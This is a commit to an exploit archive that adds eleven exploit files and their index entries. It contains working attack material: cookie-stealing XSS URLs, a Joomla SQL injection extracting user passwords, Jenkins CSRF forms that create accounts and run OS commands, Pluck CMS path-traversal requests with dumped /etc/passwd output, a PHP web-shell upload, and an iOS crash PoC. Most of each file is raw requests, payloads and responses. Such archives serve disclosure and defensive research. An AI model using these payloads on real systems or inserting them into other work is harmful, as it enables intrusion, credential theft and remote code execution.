DB: 2015-08-29

11 new exploits
This commit is contained in:
Offensive Security 2015-08-29 05:01:51 +00:00
parent cbbb44e659
commit d891c95c0e
12 changed files with 1351 additions and 0 deletions

View file

@ -34132,6 +34132,7 @@ id,file,description,date,author,platform,type,port
37944,platforms/php/webapps/37944.txt,"vBSEO 'u' parameter Cross Site Scripting Vulnerability",2012-06-16,MegaMan,php,webapps,0
37945,platforms/php/webapps/37945.txt,"SilverStripe 2.4.x 'BackURL' Parameter URI Redirection Vulnerability",2012-10-15,"Aung Khant",php,webapps,0
37946,platforms/php/webapps/37946.txt,"WordPress Crayon Syntax Highlighter Plugin 'wp_load' Parameter Remote File Include Vulnerabilities",2012-10-15,"Charlie Eriksen",php,webapps,0
38001,platforms/windows/dos/38001.py,"freeSSHd 1.3.1 - Denial of Service Vulnerability",2015-08-28,3unnym00n,windows,dos,22
37798,platforms/windows/dos/37798.py,"XMPlay 3.8.1.12 - .pls Local Crash PoC",2015-08-17,St0rn,windows,dos,0
37799,platforms/windows/local/37799.py,"MASM321 11 Quick Editor (.qeditor) 4.0g- .qse SEH Based Buffer Overflow (ASLR & SAFESEH bypass)",2015-08-17,St0rn,windows,local,0
37800,platforms/windows/remote/37800.php,"Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064)",2015-08-17,"Mohammad Reza Espargham",windows,remote,0
@ -34303,3 +34304,13 @@ id,file,description,date,author,platform,type,port
37988,platforms/linux/local/37988.py,"BSIGN 0.4.5 - Buffer Overflow",2015-08-27,"Juan Sacco",linux,local,0
37989,platforms/php/webapps/37989.txt,"IP.Board 4.X - Stored XSS",2015-08-27,snop,php,webapps,0
37990,platforms/multiple/dos/37990.txt,"QEMU Programmable Interrupt Timer Controller Heap Overflow",2015-08-27,"Google Security Research",multiple,dos,0
37991,platforms/php/webapps/37991.txt,"WANem Multiple Cross Site Scripting Vulnerabilities",2012-10-16,"Brendan Coles",php,webapps,0
37992,platforms/php/webapps/37992.txt,"CorePlayer 'callback' Parameter Cross Site Scripting Vulnerability",2012-10-28,MustLive,php,webapps,0
37993,platforms/php/webapps/37993.txt,"Joomla! 'com_quiz' Component SQL Injection",2012-10-30,"Daniel Barragan",php,webapps,0
37994,platforms/php/webapps/37994.txt,"NetCat CMS Multiple Cross Site Scripting Vulnerabilities",2012-10-31,"Security Effect Team",php,webapps,0
37995,platforms/asp/webapps/37995.txt,"SolarWinds Orion IP Address Manager (IPAM) 'search.aspx' Cross Site Scripting Vulnerability",2012-10-31,"Anthony Trummer",asp,webapps,0
37996,platforms/windows/remote/37996.txt,"Axigen Mail Server 'fileName' Parameter Directory Traversal Vulnerability",2012-10-31,"Zhao Liang",windows,remote,0
37997,platforms/ios/dos/37997.txt,"Photo Transfer (2) 1.0 iOS - Denial of Service Vulnerability",2015-08-28,Vulnerability-Lab,ios,dos,3030
37999,platforms/java/webapps/37999.txt,"Jenkins 1.626 - Cross Site Request Forgery / Code Execution",2015-08-28,smash,java,webapps,0
38000,platforms/php/webapps/38000.txt,"Wolf CMS Arbitrary File Upload To Command Execution",2015-08-28,"Narendra Bhati",php,webapps,80
38002,platforms/php/webapps/38002.txt,"Pluck CMS 4.7.3 - Multiple Vulnerabilities",2015-08-28,smash,php,webapps,80

Can't render this file because it is too large.

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/56342/info
SolarWinds Orion IP Address Manager (IPAM) is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
SolarWinds Orion IP Address Manager (IPAM) 3.0 is affected; other versions may also be vulnerable.
http://www.example.com/Orion/IPAM/search.aspx?q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%27hi%27%29%3C%2Fscript%3E

157
platforms/ios/dos/37997.txt Executable file
View file

@ -0,0 +1,157 @@
Document Title:
===============
Photo Transfer (2) v1.0 iOS - Denial of Service Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1580
Release Date:
=============
2015-08-20
Vulnerability Laboratory ID (VL-ID):
====================================
1580
Common Vulnerability Scoring System:
====================================
3.4
Product & Service Introduction:
===============================
Photo Transfer 2 is the easiest and fastest way to transfer photos (videos) from Camera Roll to computer or other iOS devices, and vice versa.
No need for USB cable, iTunes or extra equipment!
(Copy of the Vendor Homepage: https://itunes.apple.com/app/id1005399058 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a remote denial of service vulnerability in the official Photo Transfer 2 - v1.0 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2015-07-27: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Arvin Brook
Product: Photo Transfer 2 - iOS Mobile Web Application 1.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A remote denial of service vulnerability has been discovered in the official Photo Transfer 2 - v1.0 iOS mobile web-application.
The issue allows local attackers to crash or shutdown the software client by usage of special crafted payloads.
The vulnerability is located in the id value restriction of show module path context. Remote attacker can easily crash the application
remotly by including wrong and large id context in integer format. The attack vector is client-side and the request method to provoke
the mobile app crash is GET. The handling of the id path gets confused on negative integer values which results in a permanent app shutdown.
The security risk of the denial of service vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.4.
Exploitation of the DoS vulnerability requires no privilege application user account or low user interaction. Successful exploitation of the
vulnerability results in an application crash or permanent app service shutdown.
Vulnerable Module(s):
[+] ../show/
Vulnerable Parameter(s):
[+] id
Proof of Concept (PoC):
=======================
The remote denial of service web vulnerability can be exploited by remote attackers without user interaction or privilege web-application user account.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Standard URL:
http://localhost:3030/show/5
PoC: Payload (Input to show Parameter)
-9999999999999999999'
PoC URL:
http://localhost:3030/show/-9999999999999999999'
PoC: Exploit
<html>
<head><body>
<title>Photo Transfer 2 - remote Denial of Service Vulnerability</title>
<iframe src=http://localhost:3030/show/-9999999999999999999'>
<iframe src=http://localhost:3030/show/-1111111111111111111'>
<iframe src=http://localhost:3030/show/-0000000000000000000'>
</body></head>
<html>
Security Risk:
==============
The security risk of the remote denial of service vulnerability in the photo transfer 2 mobile app v1.0 is estimated as medium. (CVSS 3.4)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt

162
platforms/java/webapps/37999.txt Executable file
View file

@ -0,0 +1,162 @@
# Title: Jenkins 1.626 - Cross Site Request Forgery / Code Execution
# Date: 27.08.15
# Vendor: jenkins-ci.org
# Affected versions: => 1.626 (current)
# Software link: http://mirrors.jenkins-ci.org/war/latest/jenkins.war
# Tested on: win64
# Author: Smash_
# Contact: smash [at] devilteam.pl
Cross site request forgery vulnerability in Jenkins 1.626 allows remote attackers to hjiack the authentication of users for most request. Using CSRF it is able to change specific settings or even execute code on os as shown below.
Examples:
<html>
<!-- Change user descripton -->
<body>
<form action="http://127.0.0.1/jenkins/user/user/submitDescription" method="POST">
<input type="hidden" name="description" value="abc" />
<input type="hidden" name="json" value="&#123;"description"&#58;&#32;"abc"&#125;" />
<input type="hidden" name="Submit" value="Submit" />
<input type="submit" value="Go" />
</form>
</body>
</html>
<!-- // -->
<html>
<!-- Add user -->
<body>
<form action="http://127.0.0.1/jenkins/securityRealm/createAccountByAdmin" method="POST">
<input type="hidden" name="username" value="csrf" />
<input type="hidden" name="password1" value="pass" />
<input type="hidden" name="password2" value="pass" />
<input type="hidden" name="fullname" value="Legit&#32;Bob" />
<input type="hidden" name="email" value="bob&#64;mail&#46;box" />
<input type="hidden" name="json" value="&#123;"username"&#58;&#32;"csrf"&#44;&#32;"password1"&#58;&#32;"pass"&#44;&#32;"password2"&#58;&#32;"pass"&#44;&#32;"fullname"&#58;&#32;"Legit&#32;Bob"&#44;&#32;"email"&#58;&#32;"bob&#64;mail&#46;box"&#125;" />
<input type="hidden" name="Submit" value="Sign&#32;up" />
<input type="submit" value="Go" />
</form>
</body>
</html>
<!-- // -->
<html>
<!-- Delete user -->
<body>
<form action="http://127.0.0.1/jenkins/user/csrf/doDelete" method="POST">
<input type="hidden" name="json" value="&#123;&#125;" />
<input type="hidden" name="Submit" value="Yes" />
<input type="submit" value="Go" />
</form>
</body>
</html>
<!-- // -->
<html>
<!-- Code execution #1
groovy: print "cmd /c dir".execute().text
-->
<body>
<form action="http://127.0.0.1/jenkins/script" method="POST">
<input type="hidden" name="script" value="print&#32;"cmd&#32;&#47;c&#32;dir"&#46;execute&#40;&#41;&#46;text&#13;&#10;" />
<input type="hidden" name="json" value="&#123;"script"&#58;&#32;"print&#32;&#92;"cmd&#32;&#47;c&#32;dir&#92;"&#46;execute&#40;&#41;&#46;text&#92;n"&#44;&#32;""&#58;&#32;""&#125;" />
<input type="hidden" name="Submit" value="Wykonaj" />
<input type="submit" value="Go" />
</form>
</body>
</html>
<html>
<!-- Code execution #2
groovy: print "cmd /c dir".execute().text
-->
<body>
<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://127.0.0.1/jenkins/computer/(master)/script", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "pl,en-US;q=0.7,en;q=0.3");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.withCredentials = true;
var body = "script=println+%22cmd+%2Fc+dir%22.execute%28%29.text&json=%7B%22script%22%3A+%22println+%5C%22cmd+%2Fc+dir%5C%22.execute%28%29.text%22%2C+%22%22%3A+%22%22%7D&Submit=Wykonaj";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
</body>
</html>
Request:
POST /jenkins/script HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/jenkins/script
Cookie: JSESSIONID=E8F948238B2F4D6DAFAF191F074E6C3E; screenResolution=1600x900
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 178
script=print+%22cmd+%2Fc+dir%22.execute%28%29.text%0D%0A&json=%7B%22script%22%3A+%22print+%5C%22cmd+%2Fc+dir%5C%22.execute%28%29.text%5Cn%22%2C+%22%22%3A+%22%22%7D&Submit=Wykonaj
Response:
HTTP/1.1 200 OK
Date: Thu, 27 Aug 2015 18:06:55 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Expires: 0
Cache-Control: no-cache,no-store,must-revalidate
X-Hudson-Theme: default
X-Hudson: 1.395
X-Jenkins: 1.626
X-Jenkins-Session: 0ff3a92b
X-Hudson-CLI-Port: 1834
X-Jenkins-CLI-Port: 1834
X-Jenkins-CLI2-Port: 1834
X-Frame-Options: sameorigin
X-Instance-Identity: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAoMa5pk8H/b/c/jIOBH+D8XGi2/1MUshSuGtK41S9ON67SRR1Dzmqlzhj+Hsgla6+NJDCFKqZf3aoQbgt8nVzQRkb12bjYPHMupa58SApxwIyvhRJaNq9jq+CcllEwt9m+N1JeCxeLork82LAbiDSBbPhHBGLzqA0a9hzKVTm80i9yiTqDoEK+WyK4m8AyqJFH/V4lkERKbSr2YK1u2sFGCuBaGAK/RYspmNmJSqj0c3lPEYeDsehTSn4PHpFrbsvKkHKD1RxNDRciSFMNY3RtxpBEhKxvJHkpy9HKF+ktYebwCMZ4J8LKnhkvwqJPgpqar3FuxX4Gsfwoy0/1oCtPQIDAQAB
X-SSH-Endpoint: 127.0.0.1:1832
Content-Type: text/html;charset=UTF-8
Content-Length: 13468
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
(...)
><link rel='stylesheet' href='/jenkins/adjuncts/0ff3a92b/org/kohsuke/stapler/codemirror/theme/default.css' type='text/css' /><h2>Rezultat</h2><pre> Wolumin w stacji C to Windows7_OS
Numer seryjny woluminu: D2DC-59F9
Katalog: C:\Bitnami\jenkins-1.626-0
2015-08-27 18:51 <DIR> .
2015-08-27 18:51 <DIR> ..
2015-08-27 18:47 <DIR> apache-tomcat
2015-08-27 18:47 <DIR> apache2
2015-08-27 18:47 <DIR> apps
2015-08-27 18:49 9<>751 changelog.txt
2015-08-27 18:47 <DIR> common
2015-08-27 18:48 <DIR> git
2015-08-27 18:49 <DIR> gradle
2015-08-27 18:47 <DIR> img
2015-08-27 18:47 <DIR> java
2015-08-27 18:47 <DIR> licenses
2015-07-30 14:15 3<>080<38>056 manager-windows.exe
2015-08-27 18:50 1<>102 properties.ini
2015-08-27 18:49 12<31>118 README.txt
2015-08-27 18:50 <DIR> scripts
2015-08-27 18:47 5<>536 serviceinstall.bat
2015-08-27 18:47 5<>724 servicerun.bat
2015-08-27 18:47 <DIR> sqlite
2015-08-27 18:51 268<36>031 uninstall.dat
2015-08-27 18:51 7<>038<33>369 uninstall.exe
2015-08-27 18:50 166 use_jenkins.bat
9 plik(<28>w) 10<31>420<32>853 bajt<6A>w
13 katalog(<28>w) 110<31>690<39>426<32>880 bajt<6A>w wolnych
</pre></div>
(...)

13
platforms/php/webapps/37991.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/56326/info
WANem is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
WANem 2.3 is vulnerable; other versions may also be affected.
http://www.example.com/WANem/index-advanced.php/"><script>alert(document.cookie);</script><p+"
http://www.example.com/WANem/index-basic.php/"><script>alert(document.cookie);</script><p+"
http://www.example.com/WANem/status.php?interfaceList="><script>alert(document.cookie);</script><p+"

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/56334/info
CorePlayer is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
CorePlayer 4.0.6 is vulnerable; other versions may also be affected.
http://www.example.com/core_player.swf?callback=alert(document.cookie)

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/56338/info
The Quiz component for Joomla! is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_quiz&task=user_tst_shw&Itemid={RANDOM}&tid={RANDOM}/**/and/**/1=0/**/union/**/select/**/1,0x3c7363726970743e616c65727428646f63756d656e742e636f6f6b6965293c2f7363726970743e,concat(username,0x3D,password)/**/from/**/jos_users+--+
http://www.example.com/index.php?option=com_quiz&task=user_tst_shw&Itemid={RANDOM}&tid={RANDOM}/**/and/**/1=0/**/union/**/select/**/1,0x3c7363726970743e616c65727428646f63756d656e742e636f6f6b6965293c2f7363726970743e,0x3c7363726970743e616c65727428646f63756d656e742e636f6f6b6965293c2f7363726970743e+--+

11
platforms/php/webapps/37994.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/56340/info
NetCat CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
NetCat CMS 5.0.1 is vulnerable; other versions may also be affected.
http://www.example.com/?� onmouseover=�prompt(document.cookie)�bad=�>
http://www.example.com/search/?search_query=� onmouseover=prompt(document.cookie) bad=�

62
platforms/php/webapps/38000.txt Executable file
View file

@ -0,0 +1,62 @@
# Exploit Title : Wolf CMS 0.8.2 Arbitrary File Upload To Command
Execution
# Reported Date : 05-May-2015
# Fixed Date : 10-August-2015
# Exploit Author : Narendra Bhati
# CVE ID : CVE-2015-6567 , CVE-2015-6568
# Contact:
* Facebook : https://facebook.com/narendradewsoft
*Twitter : http://twitter.com/NarendraBhatiB
# Website : http://websecgeeks.com
# Additional Links -
* https://github.com/wolfcms/wolfcms/releases/
* https://www.wolfcms.org/blog/2015/08/10/releasing-wolf-cms-0-8-3-1.html
#For POC -
http://websecgeeks.com/wolf-cms-arbitrary-file-upload-to-command-execution/
1. Description
Every registered users who have access of upload functionality can upload
an Arbitrary File Upload To perform Command Execution
Vulnerable URL
http://targetsite.com/wolfcms/?/admin/plugin/file_manager/browse/
Vulnerable Parameter
"filename"
2. Proof of Concept
A)Login as regular user ( who have access upload functionality )
B)Go to this page -
http://targetsite.com/wolfcms/?/admin/plugin/file_manager/browse/
C)Select upload an file option to upload Arbitary File ( filename ex:
"hello.php" )
D)Now you can access the file by here -
http://targetsite.com/wolfcms/public/hello.php
3. Solution:
Update to version 0.8.3.1
http://www.wolfcms.org/download.html
=============
--
*Narendra Bhati "CEH" **( Facebook
<http://www.facebook.com/narendradewsoft> , Twitter
<http://www.twitter.com/NarendraBhatiB> , LinkedIn
<https://www.linkedin.com/profile/view?id=115146074> , Personal Blog )*
*Security Analyst - IT Risk & Security Management Services*
Suma Soft Pvt. Ltd. | Suma Center | Near Mangeshkar Hospital | Erandawane
Pune: 411004 |
*======================================================================*

384
platforms/php/webapps/38002.txt Executable file
View file

@ -0,0 +1,384 @@
# Title: Pluck 4.7.3 - Multiple vulnerabilities
# Date: 28.08.15
# Vendor: pluck-cms.org
# Affected versions: => 4.7.3 (current)
# Tested on: Apache2.2 / PHP5 / Deb32
# Author: Smash_ | smaash.net
# Contact: smash [at] devilteam.pl
Few vulnerabilities.
Bugs:
- local file inclusion
- code execution
- stored xss
- csrf
1/ LFI
File inclusion vulnerability in pluck/admin.php in the in 'action' function allows to include local files or potentially execute arbitrary PHP code.
#1 - Request (count = en.php by default):
POST /pluck/admin.php?action=language HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/pluck/admin.php?action=language
Cookie: PHPSESSID=pb60nm4nq5a14spmt1aimdl525
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
cont1=../../../../../../../etc/passwd&save=Save
#1 - Response:
HTTP/1.1 200 OK
Date: Fri, 28 Aug 2015 21:01:47 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.41-0+deb7u1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 7374
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
(...)
<div id="content">
<h2>language settings</h2>
<div class="success">The language settings have been saved.</div>
(...)
#2 - Request:
POST /pluck/admin.php?action=language HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/pluck/admin.php?action=language
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
cont1=../../../../../../etc/passwd%00&save=Save
#2 - Response:
HTTP/1.1 200 OK
Date: Fri, 28 Aug 2015 20:30:11 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.41-0+deb7u1
Set-Cookie: PHPSESSID=63erncd2l94qcah8g13bfvcga6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 4503
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
mysql:x:101:103:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
colord:x:103:107:colord colour management daemon,,,:/var/lib/colord:/bin/false
usbmux:x:104:46:usbmux daemon,,,:/home/usbmux:/bin/false
miredo:x:105:65534::/var/run/miredo:/bin/false
ntp:x:106:113::/home/ntp:/bin/false
Debian-exim:x:107:114::/var/spool/exim4:/bin/false
arpwatch:x:108:117:ARP Watcher,,,:/var/lib/arpwatch:/bin/sh
avahi:x:109:118:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
beef-xss:x:110:119::/var/lib/beef-xss:/bin/false
dradis:x:111:121::/var/lib/dradis:/bin/false
pulse:x:112:122:PulseAudio daemon,,,:/var/run/pulse:/bin/false
speech-dispatcher:x:113:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
haldaemon:x:114:124:Hardware abstraction layer,,,:/var/run/hald:/bin/false
iodine:x:115:65534::/var/run/iodine:/bin/false
postgres:x:116:127:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
sshd:x:117:65534::/var/run/sshd:/usr/sbin/nologin
redsocks:x:118:128::/var/run/redsocks:/bin/false
snmp:x:119:129::/var/lib/snmp:/bin/false
stunnel4:x:120:130::/var/run/stunnel4:/bin/false
statd:x:121:65534::/var/lib/nfs:/bin/false
sslh:x:122:133::/nonexistent:/bin/false
Debian-gdm:x:123:134:Gnome Display Manager:/var/lib/gdm3:/bin/false
rtkit:x:124:136:RealtimeKit,,,:/proc:/bin/false
saned:x:125:137::/home/saned:/bin/false
devil:x:1000:1001:devil,,,:/home/devil:/bin/bash
debian-tor:x:126:138::/var/lib/tor:/bin/false
privoxy:x:127:65534::/etc/privoxy:/bin/false
redis:x:128:139:redis server,,,:/var/lib/redis:/bin/false
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="../../../../../../etc/passwd" lang="../../../../../../etc/passwd">
<head>
(...)
2/ Code Execution
By default .php extenions shall be amended to .txt, but it is able to upload code simply by using other extension like php5.
#1 - Request:
POST /pluck/admin.php?action=files HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/pluck/admin.php?action=files
Cookie: PHPSESSID=pb60nm4nq5a14spmt1aimdl525
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------155797884312716218971623852778
Content-Length: 376
-----------------------------155797884312716218971623852778
Content-Disposition: form-data; name="filefile"; filename="phpinfo.php5"
Content-Type: application/x-php
<?php
system('id');
?>
-----------------------------155797884312716218971623852778
Content-Disposition: form-data; name="submit"
Upload
-----------------------------155797884312716218971623852778--
#1 - Response:
HTTP/1.1 200 OK
Date: Fri, 28 Aug 2015 20:41:43 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.41-0+deb7u1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 9947
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
(...)
#2 - Request:
GET /pluck/files/phpinfo.php5 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/pluck/admin.php?action=files
Cookie: PHPSESSID=pb60nm4nq5a14spmt1aimdl525
Connection: keep-alive
#2 - Response:
HTTP/1.1 200 OK
Date: Fri, 28 Aug 2015 20:41:44 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.41-0+deb7u1
Vary: Accept-Encoding
Content-Length: 54
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
uid=33(www-data) gid=33(www-data) groups=33(www-data)
3/ STORED XSS
a) image upload
XSS is possible via file name.
Request:
POST /pluck/admin.php?action=images HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/pluck/admin.php?action=images
Cookie: PHPSESSID=pb60nm4nq5a14spmt1aimdl525
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------3184135121063067737320373181
Content-Length: 5013
-----------------------------3184135121063067737320373181
Content-Disposition: form-data; name="imagefile"; filename="<img src=# onerror=alert(1337)>.png"
Content-Type: image/png
(...)
-----------------------------3184135121063067737320373181
Content-Disposition: form-data; name="submit"
Upload
-----------------------------3184135121063067737320373181--
Response:
HTTP/1.1 200 OK
Date: Fri, 28 Aug 2015 20:43:19 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.41-0+deb7u1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 9125
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
(...)
<div class="menudiv">
<strong>Name:</strong> <img src=# onerror=alert(1337)>.png <br />
<strong>Size:</strong> 4653 bytes <br />
<strong>Type:</strong> image/png <br />
<strong>Upload successful!</strong>
</div>
(...)
b) page
XSS is possible when changing request, value of POST 'content' will be encoded by default.
#1 - Request:
POST /pluck/admin.php?action=editpage HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/pluck/admin.php?action=editpage
Cookie: PHPSESSID=pb60nm4nq5a14spmt1aimdl525
